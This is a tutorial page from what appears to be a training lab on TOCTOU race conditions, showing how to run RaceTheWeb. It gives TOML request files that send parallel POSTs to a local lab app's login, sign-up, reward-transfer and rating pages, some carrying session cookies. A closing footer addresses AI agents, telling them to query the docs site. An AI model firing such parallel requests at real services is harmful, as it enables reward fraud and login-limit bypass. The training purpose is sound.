# More Tools
Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:
| Name | Notes |
| ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Browser Dev Tools | - Very easy to find
- Comes with major browsers
- Does not support sending cookies
|
| cURL | - Easy to get
- Works on almost all the platforms
- Supports sending cookies
|
We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from
Which version to download? It depends on the operating-system you are running
| **Operating System** | **FIle to be downloaded** |
| -------------------- | ---------------------------------- |
| Linux 32-bit | race-the-web\_2.0.1\_lin32.bin |
| Linux 64-bit | race-the-web\_2.0.1\_lin64.bin |
| macOS 32-bit | race-the-web\_2.0.1\_osx32.app.zip |
| macOS 64-bit | race-the-web\_2.0.1\_osx64.app.zip |
| Windows 32-bit | race-the-web\_2.0.1\_win32.exe |
| Windows 64-bit | race-the-web\_2.0.1\_win64.exe |
On Linux and macOS machines, you need to make the file executable.
| **Operating System** | **Command to run on Terminal** |
| ---------------------------------- | ------------------------------------------------------------------------- |
| race-the-web\_2.0.1\_lin32.bin | chmod +x race-the-web\_2.0.1\_lin32.bin |
| race-the-web\_2.0.1\_lin64.bin | chmod +x race-the-web\_2.0.1\_lin64.bin |
| race-the-web\_2.0.1\_osx32.app.zip | Extract the zip file
chmod +x race-the-web\_2.0.1\_osx32.app
|
| race-the-web\_2.0.1\_osx64.app.zip | Extract the zip file
chmod +x race-the-web\_2.0.1\_osx64.app
|
Running RacetheWeb is easy:
1. Open command prompt/Terminal
2. Navigate to the directory where you have extracted/downloaded the executable binary file
3. Run the following command:
!\[A screenshot of a social media post
Description automatically generated]\(/files/-MQTEVsgufUB-zUfIttZ)
**race-the-web** portion:
Depending on the operating-system you are using, the race-the-web portion needs to be changed.
| **Operating System** | **race-the-web portion** |
| -------------------- | -------------------------------- |
| Linux 32-bit | ./race-the-web\_2.0.1\_lin32.bin |
| Linux 64-bit | ./race-the-web\_2.0.1\_lin64.bin |
| macOS 32-bit | ./race-the-web\_2.0.1\_osx32.app |
| macOS 64-bit | ./race-the-web\_2.0.1\_osx64.app |
| Windows 32-bit | race-the-web\_2.0.1\_win32.exe |
| Windows 64-bit | race-the-web\_2.0.1\_win64.exe |
**\ portion:**
TOML stands for Tom’s Obvious Minimal Language. The TOML file supplied should be having the request details so that race-the-web can run them.
Find TOML file for some of the TimeGap Theory challenges below:
### Sign Up page
```
# Sign Up
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/sign-up.php"
body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100"
```
In the above TOML file:
* Count defines how many requests RaceTheWeb tools would be sending in parallel
* Verbose defines the verbosity level of output that is displayed on the screen. The value of this can either be true or false
* Method defines the type of the request. This can be GET, POST, PUT, DELETE etc.
* URL is, well, the url at which request needs to be sent
* Body of the request. You can skip this part if there is no body that needs to be submitted
### Sign In page
```
# Sign In Page
count = 1
verbose = true
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=1234&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=password&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=tom&submit=Submit"
```
In the above TOML file:
* Count is 1. However, there are three requests in the file. As such, RaceTheWeb tool will send three parallel requests
* First two requests have wrong password in the request body
### Transfer rewards page
```
# Transfer Rewards
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit"
```
### Ratings page
```
# Ratings page
count = 1
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]
```
In the above TOML file, we are sending a cookie as well.
Now you know:
1. Various open-source tools and techniques for finding and exploiting TOCTOU security issues
2. How to use RaceTheWeb tool for exploiting TOCTOU security issues
3. Writing TOML files for RaceTheWeb tool
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://book.timegaptheory.com/more-tools.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.